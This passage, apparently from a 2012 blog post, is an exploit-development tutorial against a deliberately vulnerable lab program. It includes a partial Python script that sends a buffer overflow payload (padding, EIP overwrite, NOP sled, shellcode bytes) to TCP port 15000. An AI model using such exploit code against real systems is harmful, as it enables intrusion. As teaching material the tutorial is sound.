Posts

Showing posts from February, 2012

Windows Exploit Development Remote Stack BoF

Image
This time i made a video about basic exploit development process on windows. The target machine is a Windows Server 2003 R2 with DEP disabled running a vulnerable software called vserver. Basically the vulnerable software is listening on TCP port 15000 waiting for some input and if you provide a string bigger than 15 characters it will crash. Here is vserver: - vserver download Exploit code: #!/usr/bin/python # import socket junk = b'A' * 54 eip = b'\x81\x42\x38\x77' nops = b'\x90' * 25 shellcode = b'\xbe\xb6\x17\xb0\xd8\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9' shellcode += b'\xb1\x4f\x83\xc0\x04\x31\x70\x10\x03\x70\x10\x54\xe2\x4c' shellcode += b'\x30\x11\x0d\xad\xc1\x41\x87\x48\xf0\x53\xf3\x19\xa1\x63' shellcode += b'\x77\x4f\x4a\x08\xd5\x64\xd9\x7c\xf2\x8b\x6a\xca\x24\xa5' shellcode += b'\x6b\xfb\xe8\x69\xaf\x9a\x94\x73\xfc\x7c\xa4\xbb\xf1\x7d' shellcode += b'\xe1\xa6\xfa\x2f\xba\xad\xa9\xdf\xcf\xf0\x71\xde\x1f